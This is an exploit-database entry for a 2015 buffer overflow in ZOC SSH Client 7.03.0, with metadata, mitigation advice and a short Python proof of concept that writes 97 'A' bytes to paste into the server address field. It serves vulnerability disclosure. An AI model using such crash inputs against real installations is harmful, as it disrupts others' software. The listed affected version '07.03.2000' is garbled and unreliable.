header-logo
Suggest Exploit
vendor:
ZOC SSH Client
by:
Dolev Farhi
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: ZOC SSH Client
Affected Version From: 07.03.2000
Affected Version To: 07.03.2000
Patch Exists: Yes
Related CWE: N/A
CPE: a:emtec:zoc_ssh_client
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2015

ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)

A buffer overflow vulnerability exists in ZOC SSH Client v.7.03.0. An attacker can create a new connection, run a python script to generate a string of 'AAAA...' and copy it to the clipboard. The attacker can then paste the string in the server address and attempt to connect, which can lead to a buffer overflow.

Mitigation:

Upgrade to the latest version of ZOC SSH Client.
Source

Exploit-DB raw data:

"""
# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)
# Date: 20-5-2015
# Vendor homepage: www.emtec.com
# Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html
# Author: Dolev Farhi

# Details:
# --------
# Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the
# server address and attempt to connect.
"""

#!/usr/bin/python
filename="zoc.txt"
buffer = "\x41" * 97
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

Navigation

Suggest Exploit

Services By CQR